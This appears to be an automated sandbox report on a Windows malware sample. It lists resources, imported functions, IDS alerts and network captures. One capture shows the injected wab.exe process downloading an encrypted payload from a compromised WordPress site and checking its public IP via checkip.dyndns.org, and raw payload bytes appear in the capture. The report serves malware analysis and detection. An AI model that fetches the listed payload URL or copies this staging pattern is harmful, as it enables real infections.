                RT_ICON0x693e80x94a8Device independent bitmap graphic, 96 x 192 x 32, image size 38016EnglishUnited States0.5461162497372294
                RT_ICON0x728900x6b94PNG image data, 256 x 256, 8-bit colormap, non-interlacedEnglishUnited States0.995279593318809
                RT_ICON0x794280x5488Device independent bitmap graphic, 72 x 144 x 32, image size 21600EnglishUnited States0.5835951940850277
                RT_ICON0x7e8b00x4c28Device independent bitmap graphic, 128 x 256 x 8, image size 16384EnglishUnited States0.46250512925728354
                RT_ICON0x834d80x4228Device independent bitmap graphic, 64 x 128 x 32, image size 16896EnglishUnited States0.5978979688238073
                RT_ICON0x877000x2d6fPNG image data, 256 x 256, 8-bit colormap, non-interlacedEnglishUnited States0.9944114865445791
                RT_ICON0x8a4700x2ca8Device independent bitmap graphic, 96 x 192 x 8, image size 9216EnglishUnited States0.5530090972708187
                RT_ICON0x8d1180x2868Device independent bitmap graphic, 128 x 256 x 4, image size 8192EnglishUnited States0.31254833720030933
                RT_ICON0x8f9800x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9600EnglishUnited States0.6519709543568465
                RT_ICON0x91f280x1bc8Device independent bitmap graphic, 72 x 144 x 8, image size 5184EnglishUnited States0.6259842519685039
                RT_ICON0x93af00x16e8Device independent bitmap graphic, 96 x 192 x 4, image size 4608EnglishUnited States0.3922237380627558
                RT_ICON0x951d80x1628Device independent bitmap graphic, 64 x 128 x 8, image size 4096EnglishUnited States0.68688293370945
                RT_ICON0x968000x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4224EnglishUnited States0.7211538461538461
                RT_ICON0x978a80xea8Device independent bitmap graphic, 48 x 96 x 8, image size 2304EnglishUnited States0.7316098081023454
                RT_ICON0x987500xde8Device independent bitmap graphic, 72 x 144 x 4, image size 2592EnglishUnited States0.4393258426966292
                RT_ICON0x995380xa68Device independent bitmap graphic, 64 x 128 x 4, image size 2048EnglishUnited States0.5041291291291291
                RT_ICON0x99fa00x988Device independent bitmap graphic, 24 x 48 x 32, image size 2400EnglishUnited States0.7872950819672131
                RT_ICON0x9a9280x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1024EnglishUnited States0.8375451263537906
                RT_ICON0x9b1d00x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 576EnglishUnited States0.875
                RT_ICON0x9b8980x668Device independent bitmap graphic, 48 x 96 x 4, image size 1152EnglishUnited States0.5682926829268292
                RT_ICON0x9bf000x568Device independent bitmap graphic, 16 x 32 x 8, image size 256EnglishUnited States0.7890173410404624
                RT_ICON0x9c4680x468Device independent bitmap graphic, 16 x 32 x 32, image size 1088EnglishUnited States0.8625886524822695
                RT_ICON0x9c8d00x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 512EnglishUnited States0.7204301075268817
                RT_ICON0x9cbb80x1e8Device independent bitmap graphic, 24 x 48 x 4, image size 288EnglishUnited States0.805327868852459
                RT_ICON0x9cda00x128Device independent bitmap graphic, 16 x 32 x 4, image size 128EnglishUnited States0.8040540540540541
                RT_DIALOG0x9cec80x120dataEnglishUnited States0.5138888888888888
                RT_DIALOG0x9cfe80x11cdataEnglishUnited States0.6056338028169014
                RT_DIALOG0x9d1080xc4dataEnglishUnited States0.5918367346938775
                RT_DIALOG0x9d1d00x60dataEnglishUnited States0.7291666666666666
                RT_GROUP_ICON0x9d2300x180Targa image data - Map 32 x 1235 x 1 +1EnglishUnited States0.5442708333333334
                RT_VERSION0x9d3b00x260dataEnglishUnited States0.5263157894736842
                RT_MANIFEST0x9d6100x305XML 1.0 document, ASCII text, with very long lines (773), with no line terminatorsEnglishUnited States0.5614489003880984
                DLLImport
                KERNEL32.dllCompareFileTime, SearchPathW, SetFileTime, CloseHandle, GetShortPathNameW, MoveFileW, SetCurrentDirectoryW, GetFileAttributesW, GetLastError, GetFullPathNameW, CreateDirectoryW, Sleep, GetTickCount, CreateFileW, GetFileSize, GetModuleFileNameW, GetCurrentProcess, CopyFileW, ExitProcess, SetEnvironmentVariableW, GetWindowsDirectoryW, SetFileAttributesW, ExpandEnvironmentStringsW, SetErrorMode, LoadLibraryW, lstrlenW, lstrcpynW, GetDiskFreeSpaceW, GlobalUnlock, GlobalLock, CreateThread, CreateProcessW, RemoveDirectoryW, lstrcmpiA, GetTempFileNameW, lstrcpyA, lstrcpyW, lstrcatW, GetSystemDirectoryW, GetVersion, GetProcAddress, LoadLibraryA, GetModuleHandleA, GetModuleHandleW, lstrcmpiW, lstrcmpW, WaitForSingleObject, GlobalFree, GlobalAlloc, LoadLibraryExW, GetExitCodeProcess, FreeLibrary, WritePrivateProfileStringW, GetCommandLineW, GetTempPathW, GetPrivateProfileStringW, FindFirstFileW, FindNextFileW, DeleteFileW, SetFilePointer, ReadFile, FindClose, MulDiv, MultiByteToWideChar, WriteFile, lstrlenA, WideCharToMultiByte
                USER32.dllEndDialog, ScreenToClient, GetWindowRect, RegisterClassW, EnableMenuItem, GetSystemMenu, SetClassLongW, IsWindowEnabled, SetWindowPos, GetSysColor, GetWindowLongW, SetCursor, LoadCursorW, CheckDlgButton, GetMessagePos, LoadBitmapW, CallWindowProcW, IsWindowVisible, CloseClipboard, SetClipboardData, wsprintfW, CreateWindowExW, SystemParametersInfoW, AppendMenuW, CreatePopupMenu, GetSystemMetrics, SetDlgItemTextW, GetDlgItemTextW, MessageBoxIndirectW, CharPrevW, CharNextA, wsprintfA, DispatchMessageW, PeekMessageW, ReleaseDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, GetClientRect, FillRect, DrawTextW, GetClassInfoW, DialogBoxParamW, CharNextW, ExitWindowsEx, DestroyWindow, CreateDialogParamW, SetTimer, SetWindowTextW, PostQuitMessage, GetDC, SetWindowLongW, LoadImageW, SendMessageTimeoutW, FindWindowExW, EmptyClipboard, OpenClipboard, TrackPopupMenu, EndPaint, ShowWindow, GetDlgItem, IsWindow, SetForegroundWindow
                GDI32.dllSelectObject, SetBkMode, CreateFontIndirectW, SetTextColor, DeleteObject, GetDeviceCaps, CreateBrushIndirect, SetBkColor
                SHELL32.dllSHGetSpecialFolderLocation, SHGetPathFromIDListW, SHBrowseForFolderW, SHGetFileInfoW, ShellExecuteW, SHFileOperationW
                ADVAPI32.dllRegCloseKey, RegOpenKeyExW, RegDeleteKeyW, RegDeleteValueW, RegEnumValueW, RegCreateKeyExW, RegSetValueExW, RegQueryValueExW, RegEnumKeyW
                COMCTL32.dllImageList_Create, ImageList_AddMasked, ImageList_Destroy
                ole32.dllCoCreateInstance, CoTaskMemFree, OleInitialize, OleUninitialize
                VERSION.dllGetFileVersionInfoSizeW, GetFileVersionInfoW, VerQueryValueW
                Language of compilation systemCountry where language is spokenMap
                EnglishUnited States
                TimestampProtocolSIDSignatureSource PortDest PortSource IPDest IP
                2024-07-25T03:10:19.449026+0200TCP2803270ETPRO MALWARE Common Downloader Header Pattern UHCa49707443192.168.2.7108.167.181.251
                2024-07-25T03:10:49.744744+0200TCP2028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update49723443192.168.2.720.189.173.22
                2024-07-25T03:10:00.245750+0200TCP2022930ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow4434970252.165.165.26192.168.2.7
                2024-07-25T03:10:38.895890+0200TCP2022930ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow4434971452.165.165.26192.168.2.7
                TimestampSource PortDest PortSource IPDest IP
                Jul 25, 2024 03:10:18.718350887 CEST49707443192.168.2.7108.167.181.251
                Jul 25, 2024 03:10:18.718399048 CEST44349707108.167.181.251192.168.2.7
                Jul 25, 2024 03:10:18.718522072 CEST49707443192.168.2.7108.167.181.251
                Jul 25, 2024 03:10:18.732508898 CEST49707443192.168.2.7108.167.181.251
                Jul 25, 2024 03:10:18.732526064 CEST44349707108.167.181.251192.168.2.7
                Jul 25, 2024 03:10:19.263044119 CEST44349707108.167.181.251192.168.2.7
                Jul 25, 2024 03:10:19.264414072 CEST49707443192.168.2.7108.167.181.251
                Jul 25, 2024 03:10:19.321981907 CEST49707443192.168.2.7108.167.181.251
                Jul 25, 2024 03:10:19.322002888 CEST44349707108.167.181.251192.168.2.7
                Jul 25, 2024 03:10:19.322953939 CEST44349707108.167.181.251192.168.2.7
                Jul 25, 2024 03:10:19.323040962 CEST49707443192.168.2.7108.167.181.251
                Jul 25, 2024 03:10:19.327538013 CEST49707443192.168.2.7108.167.181.251
                Jul 25, 2024 03:10:19.372499943 CEST44349707108.167.181.251192.168.2.7
                Jul 25, 2024 03:10:19.449028969 CEST44349707108.167.181.251192.168.2.7
                Jul 25, 2024 03:10:19.449059010 CEST44349707108.167.181.251192.168.2.7
                Jul 25, 2024 03:10:19.449168921 CEST49707443192.168.2.7108.167.181.251
                Jul 25, 2024 03:10:19.449183941 CEST44349707108.167.181.251192.168.2.7
                Jul 25, 2024 03:10:19.449223995 CEST49707443192.168.2.7108.167.181.251
                Jul 25, 2024 03:10:19.467927933 CEST44349707108.167.181.251192.168.2.7
                Jul 25, 2024 03:10:19.468009949 CEST49707443192.168.2.7108.167.181.251
                Jul 25, 2024 03:10:19.539781094 CEST44349707108.167.181.251192.168.2.7
                Jul 25, 2024 03:10:19.539942026 CEST49707443192.168.2.7108.167.181.251
                Jul 25, 2024 03:10:19.541171074 CEST44349707108.167.181.251192.168.2.7
                Jul 25, 2024 03:10:19.541261911 CEST49707443192.168.2.7108.167.181.251
                Jul 25, 2024 03:10:19.541646957 CEST44349707108.167.181.251192.168.2.7
                Jul 25, 2024 03:10:19.541723967 CEST49707443192.168.2.7108.167.181.251
                Jul 25, 2024 03:10:19.559595108 CEST44349707108.167.181.251192.168.2.7
                Jul 25, 2024 03:10:19.559859037 CEST49707443192.168.2.7108.167.181.251
                Jul 25, 2024 03:10:19.631063938 CEST44349707108.167.181.251192.168.2.7
                Jul 25, 2024 03:10:19.631160975 CEST49707443192.168.2.7108.167.181.251
                Jul 25, 2024 03:10:19.631187916 CEST44349707108.167.181.251192.168.2.7
                Jul 25, 2024 03:10:19.631254911 CEST49707443192.168.2.7108.167.181.251
                Jul 25, 2024 03:10:19.631769896 CEST44349707108.167.181.251192.168.2.7
                Jul 25, 2024 03:10:19.631848097 CEST49707443192.168.2.7108.167.181.251
                Jul 25, 2024 03:10:19.632684946 CEST44349707108.167.181.251192.168.2.7
                Jul 25, 2024 03:10:19.632764101 CEST49707443192.168.2.7108.167.181.251
                Jul 25, 2024 03:10:19.633542061 CEST44349707108.167.181.251192.168.2.7
                Jul 25, 2024 03:10:19.633645058 CEST49707443192.168.2.7108.167.181.251
                Jul 25, 2024 03:10:19.634495020 CEST44349707108.167.181.251192.168.2.7
                Jul 25, 2024 03:10:19.634565115 CEST49707443192.168.2.7108.167.181.251
                Jul 25, 2024 03:10:19.650768042 CEST44349707108.167.181.251192.168.2.7
                Jul 25, 2024 03:10:19.650829077 CEST44349707108.167.181.251192.168.2.7
                Jul 25, 2024 03:10:19.650856018 CEST49707443192.168.2.7108.167.181.251
                Jul 25, 2024 03:10:19.650868893 CEST44349707108.167.181.251192.168.2.7
                Jul 25, 2024 03:10:19.650942087 CEST49707443192.168.2.7108.167.181.251
                Jul 25, 2024 03:10:19.722794056 CEST44349707108.167.181.251192.168.2.7
                Jul 25, 2024 03:10:19.722959042 CEST44349707108.167.181.251192.168.2.7
                Jul 25, 2024 03:10:19.723114967 CEST49707443192.168.2.7108.167.181.251
                Jul 25, 2024 03:10:19.723114967 CEST49707443192.168.2.7108.167.181.251
                Jul 25, 2024 03:10:19.723141909 CEST44349707108.167.181.251192.168.2.7
                Jul 25, 2024 03:10:19.723155975 CEST44349707108.167.181.251192.168.2.7
                Jul 25, 2024 03:10:19.723225117 CEST49707443192.168.2.7108.167.181.251
                Jul 25, 2024 03:10:19.723231077 CEST44349707108.167.181.251192.168.2.7
                Jul 25, 2024 03:10:19.723272085 CEST49707443192.168.2.7108.167.181.251
                Jul 25, 2024 03:10:19.723453045 CEST44349707108.167.181.251192.168.2.7
                Jul 25, 2024 03:10:19.723524094 CEST49707443192.168.2.7108.167.181.251
                Jul 25, 2024 03:10:19.724145889 CEST44349707108.167.181.251192.168.2.7
                Jul 25, 2024 03:10:19.724250078 CEST49707443192.168.2.7108.167.181.251
                Jul 25, 2024 03:10:19.724369049 CEST44349707108.167.181.251192.168.2.7
                Jul 25, 2024 03:10:19.724441051 CEST49707443192.168.2.7108.167.181.251
                Jul 25, 2024 03:10:19.725084066 CEST44349707108.167.181.251192.168.2.7
                Jul 25, 2024 03:10:19.725200891 CEST49707443192.168.2.7108.167.181.251
                Jul 25, 2024 03:10:19.725366116 CEST44349707108.167.181.251192.168.2.7
                Jul 25, 2024 03:10:19.725436926 CEST49707443192.168.2.7108.167.181.251
                Jul 25, 2024 03:10:19.726063967 CEST44349707108.167.181.251192.168.2.7
                Jul 25, 2024 03:10:19.726142883 CEST49707443192.168.2.7108.167.181.251
                Jul 25, 2024 03:10:19.726296902 CEST44349707108.167.181.251192.168.2.7
                Jul 25, 2024 03:10:19.726360083 CEST49707443192.168.2.7108.167.181.251
                Jul 25, 2024 03:10:19.727010012 CEST44349707108.167.181.251192.168.2.7
                Jul 25, 2024 03:10:19.727097034 CEST49707443192.168.2.7108.167.181.251
                Jul 25, 2024 03:10:19.744792938 CEST44349707108.167.181.251192.168.2.7
                Jul 25, 2024 03:10:19.744851112 CEST44349707108.167.181.251192.168.2.7
                Jul 25, 2024 03:10:19.744911909 CEST44349707108.167.181.251192.168.2.7
                Jul 25, 2024 03:10:19.744961023 CEST49707443192.168.2.7108.167.181.251
                Jul 25, 2024 03:10:19.744985104 CEST44349707108.167.181.251192.168.2.7
                Jul 25, 2024 03:10:19.745122910 CEST49707443192.168.2.7108.167.181.251
                Jul 25, 2024 03:10:19.745122910 CEST49707443192.168.2.7108.167.181.251
                Jul 25, 2024 03:10:19.777291059 CEST44349707108.167.181.251192.168.2.7
                Jul 25, 2024 03:10:19.777584076 CEST49707443192.168.2.7108.167.181.251
                Jul 25, 2024 03:10:19.814467907 CEST44349707108.167.181.251192.168.2.7
                Jul 25, 2024 03:10:19.814623117 CEST49707443192.168.2.7108.167.181.251
                Jul 25, 2024 03:10:19.814903975 CEST44349707108.167.181.251192.168.2.7
                Jul 25, 2024 03:10:19.814986944 CEST49707443192.168.2.7108.167.181.251
                Jul 25, 2024 03:10:19.815254927 CEST44349707108.167.181.251192.168.2.7
                Jul 25, 2024 03:10:19.815339088 CEST49707443192.168.2.7108.167.181.251
                Jul 25, 2024 03:10:19.815376997 CEST44349707108.167.181.251192.168.2.7
                Jul 25, 2024 03:10:19.815459013 CEST49707443192.168.2.7108.167.181.251
                Jul 25, 2024 03:10:19.815743923 CEST44349707108.167.181.251192.168.2.7
                Jul 25, 2024 03:10:19.815821886 CEST49707443192.168.2.7108.167.181.251
                Jul 25, 2024 03:10:19.815831900 CEST44349707108.167.181.251192.168.2.7
                Jul 25, 2024 03:10:19.815892935 CEST49707443192.168.2.7108.167.181.251
                Jul 25, 2024 03:10:19.815902948 CEST44349707108.167.181.251192.168.2.7
                Jul 25, 2024 03:10:19.815959930 CEST49707443192.168.2.7108.167.181.251
                Jul 25, 2024 03:10:19.815974951 CEST44349707108.167.181.251192.168.2.7
                Jul 25, 2024 03:10:19.816031933 CEST49707443192.168.2.7108.167.181.251
                Jul 25, 2024 03:10:19.831526041 CEST49707443192.168.2.7108.167.181.251
                Jul 25, 2024 03:10:19.831547976 CEST44349707108.167.181.251192.168.2.7
                Jul 25, 2024 03:10:19.831558943 CEST49707443192.168.2.7108.167.181.251
                Jul 25, 2024 03:10:19.831621885 CEST49707443192.168.2.7108.167.181.251
                Jul 25, 2024 03:10:20.143165112 CEST4970880192.168.2.7158.101.44.242
                Jul 25, 2024 03:10:20.148875952 CEST8049708158.101.44.242192.168.2.7
                Jul 25, 2024 03:10:20.149185896 CEST4970880192.168.2.7158.101.44.242
                Jul 25, 2024 03:10:20.149610996 CEST4970880192.168.2.7158.101.44.242
                Jul 25, 2024 03:10:20.155486107 CEST8049708158.101.44.242192.168.2.7
                Jul 25, 2024 03:10:23.989202976 CEST8049708158.101.44.242192.168.2.7
                Jul 25, 2024 03:10:23.992830038 CEST8049708158.101.44.242192.168.2.7
                Jul 25, 2024 03:10:23.992885113 CEST4970880192.168.2.7158.101.44.242
                Jul 25, 2024 03:10:51.720510960 CEST4970880192.168.2.7158.101.44.242
                TimestampSource PortDest PortSource IPDest IP
                Jul 25, 2024 03:10:18.487117052 CEST5455853192.168.2.71.1.1.1
                Jul 25, 2024 03:10:18.710628986 CEST53545581.1.1.1192.168.2.7
                Jul 25, 2024 03:10:20.128070116 CEST6295853192.168.2.71.1.1.1
                Jul 25, 2024 03:10:20.135034084 CEST53629581.1.1.1192.168.2.7
                TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                Jul 25, 2024 03:10:18.487117052 CEST192.168.2.71.1.1.10xc85aStandard query (0)www.reap.skyestates.com.mtA (IP address)IN (0x0001)false
                Jul 25, 2024 03:10:20.128070116 CEST192.168.2.71.1.1.10x5af8Standard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)false
                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                Jul 25, 2024 03:10:18.710628986 CEST1.1.1.1192.168.2.70xc85aNo error (0)www.reap.skyestates.com.mt108.167.181.251A (IP address)IN (0x0001)false
                Jul 25, 2024 03:10:20.135034084 CEST1.1.1.1192.168.2.70x5af8No error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                Jul 25, 2024 03:10:20.135034084 CEST1.1.1.1192.168.2.70x5af8No error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                Jul 25, 2024 03:10:20.135034084 CEST1.1.1.1192.168.2.70x5af8No error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                Jul 25, 2024 03:10:20.135034084 CEST1.1.1.1192.168.2.70x5af8No error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                Jul 25, 2024 03:10:20.135034084 CEST1.1.1.1192.168.2.70x5af8No error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                Jul 25, 2024 03:10:20.135034084 CEST1.1.1.1192.168.2.70x5af8No error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                • www.reap.skyestates.com.mt
                • checkip.dyndns.org
                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                0192.168.2.749708158.101.44.242807476C:\Program Files (x86)\Windows Mail\wab.exe
                TimestampBytes transferredDirectionData
                Jul 25, 2024 03:10:20.149610996 CEST151OUTGET / HTTP/1.1
                User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                Host: checkip.dyndns.org
                Connection: Keep-Alive
                Jul 25, 2024 03:10:23.989202976 CEST745INHTTP/1.1 504 Gateway Time-out
                Date: Thu, 25 Jul 2024 01:10:23 GMT
                Content-Type: text/html
                Content-Length: 557
                Connection: keep-alive
                X-Request-ID: 9d2908d779cb431c5f7588cf3243cca9
                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 35 30 34 20 47 61 74 65 77 61 79 20 54 69 6d 65 2d 6f 75 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 35 30 34 20 47 61 74 65 77 61 79 20 54 69 6d 65 2d 6f 75 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c [TRUNCATED]
                Data Ascii: <html><head><title>504 Gateway Time-out</title></head><body><center><h1>504 Gateway Time-out</h1></center><hr><center></center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
                Jul 25, 2024 03:10:23.992830038 CEST745INHTTP/1.1 504 Gateway Time-out
                Date: Thu, 25 Jul 2024 01:10:23 GMT
                Content-Type: text/html
                Content-Length: 557
                Connection: keep-alive
                X-Request-ID: 9d2908d779cb431c5f7588cf3243cca9
                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 35 30 34 20 47 61 74 65 77 61 79 20 54 69 6d 65 2d 6f 75 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 35 30 34 20 47 61 74 65 77 61 79 20 54 69 6d 65 2d 6f 75 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c [TRUNCATED]
                Data Ascii: <html><head><title>504 Gateway Time-out</title></head><body><center><h1>504 Gateway Time-out</h1></center><hr><center></center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                0192.168.2.749707108.167.181.2514437476C:\Program Files (x86)\Windows Mail\wab.exe
                TimestampBytes transferredDirectionData
                2024-07-25 01:10:19 UTC203OUTGET /wp-includes/NTivwvgavzbeiE97.bin HTTP/1.1
                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                Host: www.reap.skyestates.com.mt
                Cache-Control: no-cache
                2024-07-25 01:10:19 UTC249INHTTP/1.1 200 OK
                Date: Thu, 25 Jul 2024 01:10:19 GMT
                Server: Apache
                Upgrade: h2,h2c
                Connection: Upgrade, close
                Last-Modified: Tue, 23 Jul 2024 12:31:49 GMT
                Accept-Ranges: bytes
                Content-Length: 273472
                Content-Type: application/octet-stream
                2024-07-25 01:10:19 UTC7943INData Raw: 8d 14 96 a8 ea 47 a9 d0 54 13 1f 90 f9 ce d3 da 20 c5 96 82 2a c9 c4 01 52 3c 49 da ef 4c 54 c5 30 82 a7 2e 4e 40 29 0c c3 0d 4a 2f 26 e5 1d 37 c0 95 31 c3 2e 18 72 9d de 40 98 08 20 10 50 e1 1e 53 4b 7f cd 1d e9 5d 55 ae 7d 4b 2c 67 aa 73 93 e1 0b 47 8c 13 5a 46 f5 48 49 b4 a0 d4 4f b3 02 14 eb ba 68 a6 3b 88 9e 9e e2 0f 59 dd 24 66 d0 90 ad 05 a5 bc 84 5a 32 d6 8d 67 9d 40 66 8d 80 cd 9a 4f 9a da fb 26 99 b2 04 e0 dd 2f 45 58 43 48 30 33 89 b7 7f 90 1f a1 cf 83 ca 3d 54 52 36 5b 6d 14 4b e2 8f 07 75 07 6f 06 bd b2 e5 cb 8a 4f 37 de 49 ff e6 cd ae 8a b1 26 c1 9a f7 fc 48 53 1b 34 1e e0 f2 a8 64 0e d2 d8 42 19 d3 4d ba 33 91 c9 a1 d8 9d 81 70 4d db b5 b5 af 68 f1 01 b4 4a 5e 28 c6 81 83 6f 87 71 5a 34 83 6a cd 4f 1a 99 1f fd 0b 62 40 05 98 0a 51 dc 7a e2
                Data Ascii: GT *R<ILT0.N@)J/&71.r@ PSK]U}K,gsGZFHIOh;Y$fZ2g@fO&/EXCH03=TR6[mKuoO7I&HS4dBM3pMhJ^(oqZ4jOb@Qz
                2024-07-25 01:10:19 UTC8000INData Raw: 74 d9 96 46 6f a6 16 99 5f 5d e9 14 ca ad 3b 7b 20 1d 24 f7 bd 7f 9f 54 2c 6f 35 17 ab 4f 13 39 ec a5 8a 85 94 43 7f cd 1b 7e 98 5a 0e 2a c8 48 b3 f4 da c2 51 14 70 00 f8 50 f4 5e 15 a3 20 0a 38 9a 6b 56 14 93 e2 1a c3 a5 c5 f0 73 fb 07 b8 5f 51 33 cc 8a 3a a1 04 43 d8 0a 88 a8 1c ae 17 da 97 df 0a cf f4 72 c7 f1 2d 51 0d 81 5b 2f 89 d9 ee 60 a0 2e 23 db 3b b7 87 d1 0d 61 0d 19 40 37 3a 82 8f 61 fe b7 34 cf aa bc 8c 85 cd 71 ce 20 08 7b a3 3d fc 8c 6c ea 7a a2 fe 3e 75 6a 07 50 ad 81 15 6d c6 6c 49 de 2e 31 51 89 01 5e a0 9f 5e f7 d4 a3 aa 9d 1b 20 d4 6f 46 51 75 a6 dc af 1e ae ca 44 6f 61 4c 94 0f cc ae 23 0b a8 67 21 26 a2 ce 94 de 1a eb 38 6d ff c6 9c 52 2f 6c 2a 38 bc 09 6b 53 0c 86 03 c0 6c 3c 33 9d bb 2a ac 3b 0d 69 f3 c7 3d d8 4a d6 1f cd 30 c8 b6
                Data Ascii: tFo_];{ $T,o5O9C~Z*HQpP^ 8kVs_Q3:Cr-Q[/`.#;a@7:a4q {=lz>ujPmlI.1Q^^ oFQuDoaL#g!&8mR/l*8kSl<3*;i=J0
                2024-07-25 01:10:19 UTC8000INData Raw: e9 67 00 1c f9 07 92 2d 62 57 92 6c f3 d8 9d 50 f4 ff a5 8d 06 ba 2e 4d a1 ce c4 10 9e 98 93 62 77 51 e8 4e ec fe 24 be e3 54 8a 37 7b 40 dd 68 04 94 5e 34 fc 36 bd 41 eb c2 c7 a4 ce 15 e4 ca c3 9b 7f 77 78 82 e6 58 80 51 e2 b8 6a 0b f9 56 76 f9 42 d7 9c c4 63 8d bd f6 26 75 db f2 7b b9 a5 2a 6e ce 67 12 81 99 3b 38 89 28 62 8d 9e bb 16 34 ed 9e e3 9d c4 0e c5 28 89 87 25 b7 69 cf aa 6b 95 80 8b 6b f7 13 81 f4 0a 31 6e 2f c9 82 e5 f5 cf c1 36 c8 81 8c 55 dc 73 9e 86 8f 49 76 bc 52 4c c0 c3 80 4f 09 7c b0 9d 11 11 0f 0b 56 2a d7 45 50 5e 37 a5 bb 8a 64 c3 55 19 f5 b5 5d b0 02 ff 83 d0 55 d8 04 9d 0b 06 15 87 cb a9 a6 ea f0 12 8f 09 de b9 cd 2a 21 d4 d7 98 4b 98 d3 54 6a 07 89 ea d2 06 2b e1 95 1a 40 cf 56 6b 98 49 4a 3e db b7 f6 3d 53 ae 59 02 da 79 54 b6
                Data Ascii: g-bWlP.MbwQN$T7{@h^46AwxXQjVvBc&u{*ng;8(b4(%ikk1n/6UsIvRLO|V*EP^7dU]U*!KTj+@VkIJ>=SYyT
